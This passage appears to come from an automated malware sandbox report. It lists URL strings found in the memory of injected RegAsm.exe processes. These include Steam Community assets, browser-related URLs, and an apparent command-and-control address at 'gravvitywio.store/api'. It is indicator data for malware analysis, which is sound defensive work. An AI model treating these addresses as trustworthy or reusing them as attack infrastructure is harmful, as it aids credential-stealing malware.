Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000050E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000050E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001098000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000050E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000046C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2782993650.00000000277AF000.00000004.00000020.00020000.00000000.sdmp, DGCAAFBFBKFIDGDHJDBK.15.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, AFCAAE.2.dr, EGIDAAFI.15.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000103F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541358751.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2542151523.0000000001333000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541565506.00000000012D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gravvitywio.store/
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000103F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541722970.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541565506.00000000012DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gravvitywio.store/api
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gravvitywio.store/apiy
Source: RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gravvitywio.store:443/api
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2337029963.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2340395451.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2737816539.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2585998316.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[2].htm.12.dr, 76561199780418869[1].htm.27.dr String found in binary or memory: https://help.steampowered.com/en/
